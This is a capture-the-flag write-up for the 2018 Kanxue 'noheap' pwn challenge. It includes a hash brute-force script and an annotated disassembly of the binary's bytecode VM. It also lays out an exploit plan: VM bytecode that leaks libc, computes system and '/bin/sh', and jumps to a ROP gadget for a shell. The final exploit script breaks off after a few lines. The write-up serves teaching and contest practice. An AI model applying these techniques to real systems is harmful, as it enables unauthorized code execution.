[原创] 看雪.京东 2018CTF 第六题 PWN-noheap writeup
2018-6-27 21:13 2763
1.先检查一下
所有保护全开。
2.反调试
// Banner and stdio setup (IDA name sub_E87), executed before stage 1.
int sub_E87()
{
    puts( " _____ _____ _____ _ __ __ _____ _____ ___ _____ \n"
          "| _ \\ | ____| | _ \\ | | \\ \\ / / /___ \\ / _ \\ |_ | / _ \\ \n"
          "| |_| | | |__ | | | | | | \\ \\/ / ___| | | | | | | | | |_| | \n"
          "| ___/ | __| | | | | | | \\ / / ___/ | |/| | | | } _ { \n"
          "| | | |___ | |_| | | | / / | |___ | |_| | | | | |_| | \n"
          "|_| |_____| |_____/ |_| /_/ |_____| \\_____/ |_| \\_____/ \n");
    setvbuf(stdout, 0LL, 2, 0LL); // mode 2 is _IONBF: no buffering, so prompts reach the client immediately
    setvbuf(stdin, 0LL, 2, 0LL);
    alarm(0x3Cu); // 60-second SIGALRM kills the process; author's note: interferes with debugging, patch it out with NOPs (0x90)
    puts("Welcome !");
    return puts("=======================================================================");
}
3.第一关
// Stage 1 (IDA name sub_F0C): an 8-byte secret is derived from 4 random bytes,
// only a 32-bit hash of it is printed, and the process exits unless the user
// reproduces the secret exactly.
unsigned __int64 sub_F0C()
{
    unsigned __int8 buf; // [rsp+Fh] [rbp-51h]
    unsigned int v2; // [rsp+10h] [rbp-50h]
    int i; // [rsp+14h] [rbp-4Ch]
    int fd; // [rsp+18h] [rbp-48h]
    unsigned int v5; // [rsp+1Ch] [rbp-44h]
    char s1[8]; // [rsp+20h] [rbp-40h]
    char v7; // [rsp+28h] [rbp-38h]  NUL terminator directly after s1
    char s2[8]; // [rsp+30h] [rbp-30h]
    char v9; // [rsp+38h] [rbp-28h]  NUL terminator directly after s2
    unsigned __int64 v10; // [rsp+48h] [rbp-18h]

    v10 = __readfsqword(0x28u); // stack canary
    *(_QWORD *)s1 = 0LL;
    v7 = 0;
    *(_QWORD *)s2 = 0LL;
    v9 = 0;
    v2 = 0;
    fd = open("/dev/urandom", 0); // return value is not checked
    for ( i = 0; i <= 3; ++i )
    {
        read(fd, &buf, 1uLL);
        v2 = (v2 << 8) + buf % 0x2Bu + 48; // each of the 4 seed bytes lands in [48, 48 + 0x2B)
    }
    // sub_108A updates *a1 in place, so the second call continues from the first call's result.
    *(_DWORD *)s1 = sub_108A(&v2);
    *(_DWORD *)&s1[4] = sub_108A(&v2);
    v5 = sub_10B2(s1, 8LL); // 32-bit hash over the 8 secret bytes
    printf("Hash:%08x\n", v5); // only the hash is disclosed to the client
    printf("Input:");
    sub_14F0(s2, 9LL); // reads the guess into s2; 9 presumably is the byte limit (8 + NUL) -- confirm in sub_14F0
    close(fd);
    if ( strcmp(s1, s2) )
        exit(0); // wrong guess: silent exit
    puts("=======================================================================");
    return __readfsqword(0x28u) ^ v10;
}
从/dev/urandom 循环读取四字节,通过一定运算组成一个DWORD数值v2.
通过函数
// One LCG step (IDA name sub_108A): *a1 = 214013 * *a1 + 2531011, wrapping at
// 32 bits because a1 points to an unsigned int. These are the multiplier and
// increment of the MSVC CRT rand() generator. The new state is stored in place
// and also returned.
__int64 __fastcall sub_108A(unsigned int *a1)
{
    *a1 = 214013 * *a1 + 2531011;
    return *a1;
}
构造一个8个字节的字符串。
IDA反编译的有点问题,其实第二次调用sub_108A时传入的是第一次调用的返回值。
接着利用sub_10b2计算一个hash,并输出出来。
// Hash (IDA name sub_10B2): h = 131 * h + byte over a2 bytes of a1, with
// 32-bit wraparound (v6 is unsigned int). The do/while processes at least one
// byte even if a2 <= 0.
__int64 __fastcall sub_10B2(unsigned __int8 *a1, int a2)
{
    unsigned __int8 *v2; // rax
    int v4; // [rsp+0h] [rbp-1Ch]
    unsigned __int8 *v5; // [rsp+4h] [rbp-18h]
    unsigned int v6; // [rsp+14h] [rbp-8h]

    v5 = a1;
    v4 = a2;
    v6 = 0;
    do
    {
        v2 = v5++;
        v6 = 131 * v6 + *v2;
        --v4;
    }
    while ( v4 > 0 );
    return v6;
}
再接着要求我们输入一个8字节的字符串,要求跟上边的s1一致。
这关只能爆破。
从v2的生成代码(v2 = (v2 << 8) + buf % 0x2Bu + 48;)可以看出,v2的每个字节都介于[48+0,48+0x2B)之间。
利用此特性,可获取到hash值之后,爆破出v2的值,进而获取到s1字符串。
爆破代码如下:
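import struct
import binascii
import time
import itertools
import functools


def time_me(fn):
    """Decorator: print how many wall-clock seconds *fn* took after each call.

    time.time() is used because time.clock() was removed in Python 3.8.
    """
    @functools.wraps(fn)
    def _wrapper(*args, **kwargs):
        start = time.time()
        ret = fn(*args, **kwargs)
        print("%s cost %s second" % (fn.__name__, time.time() - start))
        return ret
    return _wrapper


def calc_1(v2):
    """One step of the binary's LCG (sub_108A): 214013*x + 2531011 mod 2**32."""
    return (214013 * v2 + 2531011) & 0xffffffff


def mk_string(v2):
    """Build the 8-byte secret the binary compares against (s1 in sub_F0C).

    Two consecutive LCG outputs are packed as little-endian DWORDs, which is
    how the x86-64 binary stores them in memory; the byte order is spelled out
    so the result does not depend on the host's endianness.
    Returns str on Python 2 and bytes on Python 3.
    """
    first = calc_1(v2)
    second = calc_1(first)
    return struct.pack("<II", first, second)


def calc_2(v2_str):
    """Replicate sub_10B2: h = 131*h + byte over every byte, truncated to 32 bits.

    bytearray() yields ints on both Python 2 and 3, so str and bytes input work.
    """
    v6 = 0
    for b in bytearray(v2_str):
        v6 = (0x83 * v6 + b) & 0xffffffff
    return v6


def calc(v2):
    """Return (hash, secret) for the candidate seed *v2*."""
    v2_str = mk_string(v2)
    return calc_2(v2_str), v2_str


@time_me
def Crack(in_value):
    """Brute-force the seed whose derived 8-byte string hashes to *in_value*.

    Each seed byte lies in [0x30, 0x30 + 0x2b) because the binary computes
    `buf % 0x2B + 48`, so there are 0x2b**4 (~3.4M) candidates. The search
    returns at the first hit; the original nested loops only left the
    innermost loop and kept scanning the remaining candidates.
    Returns the matching string, or b"" when nothing hashes to in_value.
    """
    digits = range(0x30, 0x30 + 0x2b)
    for i1, i2, i3, i4 in itertools.product(digits, repeat=4):
        v2 = (i1 << 24) | (i2 << 16) | (i3 << 8) | i4
        v2_ret, v2_str = calc(v2)
        if v2_ret == in_value:
            print("%r %s" % (v2_str, binascii.b2a_hex(v2_str)))
            return v2_str
    return b""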
此算法爆破一个值大约需要7-10s.
4.第二关
// Stage 2 entry (IDA name sub_1470): show the menu, read the choice, and for
// choices 1..3 transfer control into the bytecode VM. The XOR expressions on
// qword_2030C0 and the JUMPOUT are most likely decompiler artefacts of an
// indirect jump IDA could not resolve (the disassembly below is the reliable
// view); treat everything inside the bounds check as opaque.
__int64 sub_1470()
{
    __int64 result; // rax
    __int64 v1; // ST38_8
    __int64 v2; // ST90_8
    unsigned int v3; // [rsp+74h] [rbp-4h]

    Menu_1591();
    v3 = read_1547();
    result = v3;
    if ( v3 )
    {
        result = v3;
        if ( v3 <= 3 ) // only choices 1, 2 and 3 are dispatched
        {
            v1 = qword_2030C0[~((unsigned __int8)v3 - 1LL) - 7] ^ qword_2030C0[~((unsigned __int8)v3 - 1LL) - 2];
            v2 = qword_2030C0[-11] ^ qword_2030C0[-6];
            JUMPOUT(__CS__, qword_2030C0[-7] ^ qword_2030C0[-12]);
        }
    }
    return result;
}
显示菜单并读取出来用户输入选项之后就会进入虚拟机。
虚拟机先不说,先说三个选项。
1.Malloc函数
主要的漏洞就在这个函数。
2.show
3.free
看完这三个函数,刚开始没有发现读取数据时会覆盖vm_code,还以为是house_of_force。https://ctf-wiki.github.io/ctf-wiki/pwn/heap/house_of_force/
但是此题中qword_203240处只能保存最后一次申请的空间,没办法形成此利用提交。
郁闷了好久想起来了之前的比赛,此题出题思路应该是跟 看雪.Wifi万能钥匙 2017CTF年中赛 第九题 Silence Server
https://ctf.pediy.com/game-fight-39.htm
似乎是一样的,要利用虚拟机进行操作。
虚拟机代码:
; Bytecode interpreter (IDA name sub_5574B3183107), entered from the menu dispatcher.
; The VM's "registers" are slots in the host stack frame:
;   var_40 = instruction pointer (byte index into vm_code)
;   var_30 = 8-bit operand loaded by opcode 01
;   var_38, var_20 = two 64-bit accumulators; var_28 = a third 64-bit register
;   var_18 = comparison flag (0 when equal); var_10 = current opcode
; Decode: opcode = sign-extended vm_code[ip]; anything above 16h (unsigned compare,
; so bytes >= 80h as well) leaves the loop through "default".
; Points relevant to the writeup: opcodes 03/04 read a qword at vm_code+var_30
; (constants embedded in the bytecode), opcodes 19/20 read and write the host
; stack at &var_40 - 8*var_30, opcode 22 jumps to the address in var_38, and no
; operand, index or ip is range-checked anywhere in the routine.
.text:00005574B3183107 sub_5574B3183107 proc near ; DATA XREF: sub_5574B3182CB5+FB↑o
.text:00005574B3183107
.text:00005574B3183107 var_40= qword ptr -40h
.text:00005574B3183107 var_38= qword ptr -38h
.text:00005574B3183107 var_30= qword ptr -30h
.text:00005574B3183107 var_28= qword ptr -28h
.text:00005574B3183107 var_20= qword ptr -20h
.text:00005574B3183107 var_18= qword ptr -18h
.text:00005574B3183107 var_10= qword ptr -10h
.text:00005574B3183107 var_8= qword ptr -8
.text:00005574B3183107
; all VM registers start at zero
.text:00005574B3183107 mov [rbp+var_40], 0
.text:00005574B318310F mov [rbp+var_10], 0
.text:00005574B3183117 mov [rbp+var_30], 0
.text:00005574B318311F mov [rbp+var_8], 0
.text:00005574B3183127 mov [rbp+var_28], 0
.text:00005574B318312F mov [rbp+var_38], 0
.text:00005574B3183137 mov [rbp+var_20], 0
.text:00005574B318313F mov [rbp+var_18], 0
.text:00005574B3183147
; fetch/decode loop
.text:00005574B3183147 main_: ; CODE XREF: sub_5574B3183107:default1↓j
.text:00005574B3183147 mov rdx, [rbp+var_40] ; rbp-40h vm_code[index]
.text:00005574B318314B lea rax, vm_code
.text:00005574B3183152 add rax, rdx
.text:00005574B3183155 movzx eax, byte ptr [rax]
.text:00005574B3183158 movsx rax, al ; opcode is sign-extended
.text:00005574B318315C mov [rbp+var_10], rax
.text:00005574B3183160 cmp [rbp+var_10], 16h ; switch 23 cases
.text:00005574B3183165 ja default ; jumptable 000000000000118E default case
.text:00005574B318316B mov rax, [rbp+var_10]
.text:00005574B318316F lea rdx, ds:0[rax*4]
.text:00005574B3183177 lea rax, jump_table
.text:00005574B318317E mov eax, [rdx+rax]
.text:00005574B3183181 movsxd rdx, eax
.text:00005574B3183184 lea rax, jump_table
.text:00005574B318318B add rax, rdx
.text:00005574B318318E jmp rax ; switch jump
.text:00005574B3183190 ; ---------------------------------------------------------------------------
.text:00005574B3183190
; opcode 01 imm8: var_30 = zero-extended vm_code[ip+1]; ip += 2
.text:00005574B3183190 case_1: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183190 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183190 mov rax, [rbp+var_40] ; jumptable 000000000000118E case 1
.text:00005574B3183194 lea rdx, [rax+1]
.text:00005574B3183198 lea rax, vm_code
.text:00005574B318319F add rax, rdx
.text:00005574B31831A2 movzx eax, byte ptr [rax]
.text:00005574B31831A5 movzx eax, al
.text:00005574B31831A8 mov [rbp+var_30], rax ; var_30 = operand byte
.text:00005574B31831AC mov rax, [rbp+var_40]
.text:00005574B31831B0 add rax, 2
.text:00005574B31831B4 mov [rbp+var_40], rax ; [rbp-40h]+=2
.text:00005574B31831B8 jmp default1
.text:00005574B31831BD ; ---------------------------------------------------------------------------
.text:00005574B31831BD
; opcode 02: var_28 = zero-extended byte vm_code[var_30]; ip += 1
.text:00005574B31831BD case_2: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31831BD ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31831BD lea rdx, vm_code ; jumptable 000000000000118E case 2
.text:00005574B31831C4 mov rax, [rbp+var_30]
.text:00005574B31831C8 add rax, rdx
.text:00005574B31831CB movzx eax, byte ptr [rax]
.text:00005574B31831CE movzx eax, al
.text:00005574B31831D1 mov [rbp+var_28], rax ; var_28 = vm_code[var_30]
.text:00005574B31831D5 mov rax, [rbp+var_40]
.text:00005574B31831D9 add rax, 1
.text:00005574B31831DD mov [rbp+var_40], rax
.text:00005574B31831E1 jmp default1
.text:00005574B31831E6 ; ---------------------------------------------------------------------------
.text:00005574B31831E6
; opcode 03: var_38 = qword at vm_code + var_30; ip += 1
.text:00005574B31831E6 case_3: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31831E6 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31831E6 lea rdx, vm_code ; jumptable 000000000000118E case 3
.text:00005574B31831ED mov rax, [rbp+var_30]
.text:00005574B31831F1 add rax, rdx
.text:00005574B31831F4 mov rax, [rax]
.text:00005574B31831F7 mov [rbp+var_38], rax
.text:00005574B31831FB mov rax, [rbp+var_40]
.text:00005574B31831FF add rax, 1
.text:00005574B3183203 mov [rbp+var_40], rax
.text:00005574B3183207 jmp default1
.text:00005574B318320C ; ---------------------------------------------------------------------------
.text:00005574B318320C
; opcode 04: var_20 = qword at vm_code + var_30; ip += 1  (used by the writeup to load constants)
.text:00005574B318320C case_4: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318320C ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318320C lea rdx, vm_code ; jumptable 000000000000118E case 4
.text:00005574B3183213 mov rax, [rbp+var_30]
.text:00005574B3183217 add rax, rdx
.text:00005574B318321A mov rax, [rax]
.text:00005574B318321D mov [rbp+var_20], rax
.text:00005574B3183221 mov rax, [rbp+var_40]
.text:00005574B3183225 add rax, 1
.text:00005574B3183229 mov [rbp+var_40], rax
.text:00005574B318322D jmp default1
.text:00005574B3183232 ; ---------------------------------------------------------------------------
.text:00005574B3183232
; opcode 05: var_38 -= var_20; ip += 1
.text:00005574B3183232 case_5: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183232 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183232 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 5
.text:00005574B3183236 sub rax, [rbp+var_20]
.text:00005574B318323A mov [rbp+var_38], rax
.text:00005574B318323E mov rax, [rbp+var_40]
.text:00005574B3183242 add rax, 1
.text:00005574B3183246 mov [rbp+var_40], rax
.text:00005574B318324A jmp default1
.text:00005574B318324F ; ---------------------------------------------------------------------------
.text:00005574B318324F
; opcode 06: var_38 += var_20; ip += 1
.text:00005574B318324F case_6: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318324F ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318324F mov rdx, [rbp+var_38] ; jumptable 000000000000118E case 6
.text:00005574B3183253 mov rax, [rbp+var_20]
.text:00005574B3183257 add rax, rdx
.text:00005574B318325A mov [rbp+var_38], rax
.text:00005574B318325E mov rax, [rbp+var_40]
.text:00005574B3183262 add rax, 1
.text:00005574B3183266 mov [rbp+var_40], rax
.text:00005574B318326A jmp default1
.text:00005574B318326F ; ---------------------------------------------------------------------------
.text:00005574B318326F
; opcode 07: var_38 *= var_20 (signed multiply, low 64 bits); ip += 1
.text:00005574B318326F case_7: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318326F ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318326F mov rax, [rbp+var_38] ; jumptable 000000000000118E case 7
.text:00005574B3183273 imul rax, [rbp+var_20]
.text:00005574B3183278 mov [rbp+var_38], rax
.text:00005574B318327C mov rax, [rbp+var_40]
.text:00005574B3183280 add rax, 1
.text:00005574B3183284 mov [rbp+var_40], rax
.text:00005574B3183288 jmp default1
.text:00005574B318328D ; ---------------------------------------------------------------------------
.text:00005574B318328D
; opcode 08: var_38 = var_38 / var_20 (unsigned, rdx cleared first); var_20 == 0 raises #DE; ip += 1
.text:00005574B318328D case_8: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318328D ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318328D mov rax, [rbp+var_38] ; jumptable 000000000000118E case 8
.text:00005574B3183291 mov edx, 0
.text:00005574B3183296 div [rbp+var_20]
.text:00005574B318329A mov [rbp+var_38], rax
.text:00005574B318329E mov rax, [rbp+var_40]
.text:00005574B31832A2 add rax, 1
.text:00005574B31832A6 mov [rbp+var_40], rax
.text:00005574B31832AA jmp default1
.text:00005574B31832AF ; ---------------------------------------------------------------------------
.text:00005574B31832AF
; opcode 09: var_38 ^= var_20; ip += 1
.text:00005574B31832AF case_9: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31832AF ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31832AF mov rax, [rbp+var_38] ; jumptable 000000000000118E case 9
.text:00005574B31832B3 xor rax, [rbp+var_20]
.text:00005574B31832B7 mov [rbp+var_38], rax
.text:00005574B31832BB mov rax, [rbp+var_40]
.text:00005574B31832BF add rax, 1
.text:00005574B31832C3 mov [rbp+var_40], rax
.text:00005574B31832C7 jmp default1
.text:00005574B31832CC ; ---------------------------------------------------------------------------
.text:00005574B31832CC
; opcode 0A: var_38 &= var_20; ip += 1
.text:00005574B31832CC case_10: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31832CC ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31832CC mov rax, [rbp+var_38] ; jumptable 000000000000118E case 10
.text:00005574B31832D0 and rax, [rbp+var_20]
.text:00005574B31832D4 mov [rbp+var_38], rax
.text:00005574B31832D8 mov rax, [rbp+var_40]
.text:00005574B31832DC add rax, 1
.text:00005574B31832E0 mov [rbp+var_40], rax
.text:00005574B31832E4 jmp default1
.text:00005574B31832E9 ; ---------------------------------------------------------------------------
.text:00005574B31832E9
; opcode 0B: var_38 |= var_20; ip += 1
.text:00005574B31832E9 case_11: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31832E9 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31832E9 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 11
.text:00005574B31832ED or rax, [rbp+var_20]
.text:00005574B31832F1 mov [rbp+var_38], rax
.text:00005574B31832F5 mov rax, [rbp+var_40]
.text:00005574B31832F9 add rax, 1
.text:00005574B31832FD mov [rbp+var_40], rax
.text:00005574B3183301 jmp default1
.text:00005574B3183306 ; ---------------------------------------------------------------------------
.text:00005574B3183306
; opcode 0C: var_18 = 0 if var_38 == var_20 else 1; ip += 1
.text:00005574B3183306 case12: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183306 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183306 mov rax, [rbp+var_38] ; jumptable 000000000000118E case 12
.text:00005574B318330A cmp rax, [rbp+var_20]
.text:00005574B318330E jnz short loc_5574B318331A
.text:00005574B3183310 mov [rbp+var_18], 0
.text:00005574B3183318 jmp short loc_5574B3183322
.text:00005574B318331A ; ---------------------------------------------------------------------------
.text:00005574B318331A
.text:00005574B318331A loc_5574B318331A: ; CODE XREF: sub_5574B3183107+207↑j
.text:00005574B318331A mov [rbp+var_18], 1
.text:00005574B3183322
.text:00005574B3183322 loc_5574B3183322: ; CODE XREF: sub_5574B3183107+211↑j
.text:00005574B3183322 mov rax, [rbp+var_40]
.text:00005574B3183326 add rax, 1
.text:00005574B318332A mov [rbp+var_40], rax
.text:00005574B318332E jmp default1
.text:00005574B3183333 ; ---------------------------------------------------------------------------
.text:00005574B3183333
; opcode 0D: conditional jump. If var_18 == 0, ip = zero-extended vm_code[ip] -- note the byte is
; read at ip itself (the opcode position), not ip+1, so the target is always 0Dh; this looks like
; a bug in the VM. Otherwise ip += 2.
.text:00005574B3183333 case_13: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183333 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183333 cmp [rbp+var_18], 0 ; jumptable 000000000000118E case 13
.text:00005574B3183338 jnz short loc_5574B3183357
.text:00005574B318333A mov rdx, [rbp+var_40]
.text:00005574B318333E lea rax, vm_code
.text:00005574B3183345 add rax, rdx
.text:00005574B3183348 movzx eax, byte ptr [rax]
.text:00005574B318334B movzx eax, al
.text:00005574B318334E mov [rbp+var_40], rax
.text:00005574B3183352 jmp default1
.text:00005574B3183357 ; ---------------------------------------------------------------------------
.text:00005574B3183357
.text:00005574B3183357 loc_5574B3183357: ; CODE XREF: sub_5574B3183107+231↑j
.text:00005574B3183357 mov rax, [rbp+var_40]
.text:00005574B318335B add rax, 2
.text:00005574B318335F mov [rbp+var_40], rax
.text:00005574B3183363 jmp default1
.text:00005574B3183368 ; ---------------------------------------------------------------------------
.text:00005574B3183368
; opcode 0E: var_38 = var_28; ip += 1
.text:00005574B3183368 case_14: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183368 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183368 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 14
.text:00005574B318336C mov [rbp+var_38], rax
.text:00005574B3183370 mov rax, [rbp+var_40]
.text:00005574B3183374 add rax, 1
.text:00005574B3183378 mov [rbp+var_40], rax
.text:00005574B318337C jmp default1
.text:00005574B3183381 ; ---------------------------------------------------------------------------
.text:00005574B3183381
; opcode 0F: var_20 = var_28; ip += 1
.text:00005574B3183381 case15: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183381 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183381 mov rax, [rbp+var_28] ; jumptable 000000000000118E case 15
.text:00005574B3183385 mov [rbp+var_20], rax
.text:00005574B3183389 mov rax, [rbp+var_40]
.text:00005574B318338D add rax, 1
.text:00005574B3183391 mov [rbp+var_40], rax
.text:00005574B3183395 jmp default1
.text:00005574B318339A ; ---------------------------------------------------------------------------
.text:00005574B318339A
; opcode 10: var_28 = var_38; ip += 1
.text:00005574B318339A case16: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318339A ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318339A mov rax, [rbp+var_38] ; jumptable 000000000000118E case 16
.text:00005574B318339E mov [rbp+var_28], rax
.text:00005574B31833A2 mov rax, [rbp+var_40]
.text:00005574B31833A6 add rax, 1
.text:00005574B31833AA mov [rbp+var_40], rax
.text:00005574B31833AE jmp default1
.text:00005574B31833B3 ; ---------------------------------------------------------------------------
.text:00005574B31833B3
; opcode 11: var_28 = var_20; ip += 1
.text:00005574B31833B3 case17: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31833B3 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31833B3 mov rax, [rbp+var_20] ; jumptable 000000000000118E case 17
.text:00005574B31833B7 mov [rbp+var_28], rax
.text:00005574B31833BB mov rax, [rbp+var_40]
.text:00005574B31833BF add rax, 1
.text:00005574B31833C3 mov [rbp+var_40], rax
.text:00005574B31833C7 jmp default1
.text:00005574B31833CC ; ---------------------------------------------------------------------------
.text:00005574B31833CC
; opcode 12: var_38 = var_20; ip += 1
.text:00005574B31833CC case18: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31833CC ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31833CC mov rax, [rbp+var_20] ; jumptable 000000000000118E case 18
.text:00005574B31833D0 mov [rbp+var_38], rax
.text:00005574B31833D4 mov rax, [rbp+var_40]
.text:00005574B31833D8 add rax, 1
.text:00005574B31833DC mov [rbp+var_40], rax
.text:00005574B31833E0 jmp default1
.text:00005574B31833E5 ; ---------------------------------------------------------------------------
.text:00005574B31833E5
; opcode 13: var_38 = *(qword *)(&var_40 - 8*var_30); ip += 1. Reads the host stack below the
; VM frame with no bounds check -- the writeup finds a libc (printf) return address at var_40[-0x2d].
.text:00005574B31833E5 case19: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B31833E5 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B31833E5 mov rax, [rbp+var_30] ; jumptable 000000000000118E case 19
.text:00005574B31833E9 shl rax, 3
.text:00005574B31833ED neg rax
.text:00005574B31833F0 mov rdx, rax
.text:00005574B31833F3 lea rax, [rbp+var_40]
.text:00005574B31833F7 add rax, rdx
.text:00005574B31833FA mov rax, [rax]
.text:00005574B31833FD mov [rbp+var_38], rax
.text:00005574B3183401 mov rax, [rbp+var_40]
.text:00005574B3183405 add rax, 1
.text:00005574B3183409 mov [rbp+var_40], rax
.text:00005574B318340D jmp short default1
.text:00005574B318340F ; ---------------------------------------------------------------------------
.text:00005574B318340F
; opcode 14: *(qword *)(&var_40 - 8*var_30) = var_38; ip += 1. The matching host-stack write, also unchecked.
.text:00005574B318340F case20: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318340F ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318340F mov rax, [rbp+var_30] ; jumptable 000000000000118E case 20
.text:00005574B3183413 shl rax, 3
.text:00005574B3183417 neg rax
.text:00005574B318341A mov rdx, rax
.text:00005574B318341D lea rax, [rbp+var_40]
.text:00005574B3183421 add rdx, rax
.text:00005574B3183424 mov rax, [rbp+var_38]
.text:00005574B3183428 mov [rdx], rax
.text:00005574B318342B mov rax, [rbp+var_40]
.text:00005574B318342F add rax, 1
.text:00005574B3183433 mov [rbp+var_40], rax
.text:00005574B3183437 jmp short default1
.text:00005574B3183439 ; ---------------------------------------------------------------------------
.text:00005574B3183439
; opcode 15: var_28 += 1; ip += 1
.text:00005574B3183439 case21: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B3183439 ; DATA XREF: .rodata:jump_table↓o
.text:00005574B3183439 add [rbp+var_28], 1 ; jumptable 000000000000118E case 21
.text:00005574B318343E mov rax, [rbp+var_40]
.text:00005574B3183442 add rax, 1
.text:00005574B3183446 mov [rbp+var_40], rax
.text:00005574B318344A jmp short default1
.text:00005574B318344C ; ---------------------------------------------------------------------------
.text:00005574B318344C
; opcode 16: ip += 1, then jmp to the host address held in var_38 (no validation); the
; "jmp short default1" that follows is unreachable.
.text:00005574B318344C case22: ; CODE XREF: sub_5574B3183107+87↑j
.text:00005574B318344C ; DATA XREF: .rodata:jump_table↓o
.text:00005574B318344C mov rax, [rbp+var_40] ; jumptable 000000000000118E case 22
.text:00005574B3183450 add rax, 1
.text:00005574B3183454 mov [rbp+var_40], rax
.text:00005574B3183458 mov rax, [rbp+var_38]
.text:00005574B318345C jmp rax ; author's note: "jump to add"
.text:00005574B318345E ; ---------------------------------------------------------------------------
.text:00005574B318345E jmp short default1
.text:00005574B3183460 ; ---------------------------------------------------------------------------
.text:00005574B3183460
; VM exit: opcode above 16h. Drops the 80h-byte frame and returns to the caller
; (IDA's "sp-analysis failed" comes from this manual stack adjustment).
.text:00005574B3183460 default: ; CODE XREF: sub_5574B3183107+5E↑j
.text:00005574B3183460 ; sub_5574B3183107+87↑j
.text:00005574B3183460 ; DATA XREF: ...
.text:00005574B3183460 add rsp, 80h ; jumptable 000000000000118E default case
.text:00005574B3183467 jmp short loc_5574B318346E
.text:00005574B3183469 ; ---------------------------------------------------------------------------
.text:00005574B3183469
; common tail of every handler: back to the fetch loop
.text:00005574B3183469 default1: ; CODE XREF: sub_5574B3183107+B1↑j
.text:00005574B3183469 ; sub_5574B3183107+DA↑j ...
.text:00005574B3183469 jmp main_ ; rbp-40h vm_code[index]
.text:00005574B318346E ; ---------------------------------------------------------------------------
.text:00005574B318346E
.text:00005574B318346E loc_5574B318346E: ; CODE XREF: sub_5574B3183107+360↑j
.text:00005574B318346E pop rbp
.text:00005574B318346F retn
.text:00005574B318346F ; } // starts at 5574B31830FE
.text:00005574B318346F sub_5574B3183107 endp ; sp-analysis failed
整理之后的指令表。
栈中情况
利用思路:
1.第一次malloc的时候,size设为0,并将payload写入。
payload='A'*80+'0'*0xe+vm_code
第一部分只为填充
第二部分 是之前跳转到Malloc函数时已经执行的指令,这里随便可以是什么值
第三部分是从Malloc函数返回之后开始执行的vm_code
返回之后:
var_40 在00007FFC593372D0处
print函数地址在00007F616CA8A899处
var_40[-0x2d]处即是此值。
有了printf的地址,可利用vm代码计算出system地址和/bin/sh的地址。并把这两个值压栈。
最后根据var_40上边的malloc的地址
00007FFC593372C0 E4 85 50 67 B9 55 00 00
计算出rop跳板地址:
; the "rop trampoline" mentioned above: pop rdi ; retn
.text:000055B9675087E3 pop rdi
.text:000055B9675087E4 retn
即可执行system("/bin/sh")
vm_code 布置如下:
#计算system地址 并压栈
01 2d :var_30=2d
13 :var_38=var_40[-var_30] var_38=printf_addr+99
01 27 :var_30=27
04 :var_20=vm_code[var_30] =0x0000000000010509
05 :var_38=var_38-var_20 var_38=system_addr
01 07 :var_30=07
14 :var_40[-var_30]=var_38 [rsp+8]=system_addr
#计算/bin/sh字符串地址并压栈
01 2f :var_30=2f
04 :var_20=vm_code[var_30] =0x00000000001479c7
06 :var_38=var_38+var_20 var_38=binsh_str_addr
0108 :var_30=08
14 :var_40[-var_30]=var_38 [rsp]=binsh_str_addr
#计算rop地址并跳转
01 02 :var_30=2
13 :var_38=var_40[-var_30] var_38=add_addr malloc_addr
01 37 :var_30=37
04 :var_20=vm_code[var_30] =0x00000000000001ff
06 :var_38=var_38+var_20 var_38==rop_addr
16 :jmp var_38
local_system=0x45390
local_printf=0x55800
net_system=0x45390
net_printf=0x55800
0905010000000000:offset1 =printf_addr-local_printf+local_system=var_38-0x99-0x55800+0x45390=var_38-0x10509
c779140000000000:offset2 =system_addr-binsh_str_addr
ff01000000000000:offset3 =rop_addr-add_addr=00005574B31837E3-00005574B31835E4=0x1ff
完整exp:
# Complete solver as published in the writeup. Python 2 code: print statements,
# str payloads, time.clock(). Flow: pass stage 1 by brute-forcing the printed
# hash, then feed the "add" (malloc) option a payload that overwrites vm_code so
# the VM executes the bytecode laid out in the table above.
from pwn import *
import binascii
import time
import struct
g_local=False  # True: run ./noheap locally and wait for a debugger; False: connect to the challenge server
context.log_level='debug'
# duplicate imports, harmless
import struct
import binascii
import time
def time_me(fn):
    # Decorator: report how long fn took (time.clock() no longer exists on Python 3.8+).
    def _wrapper(*args, **kwargs):
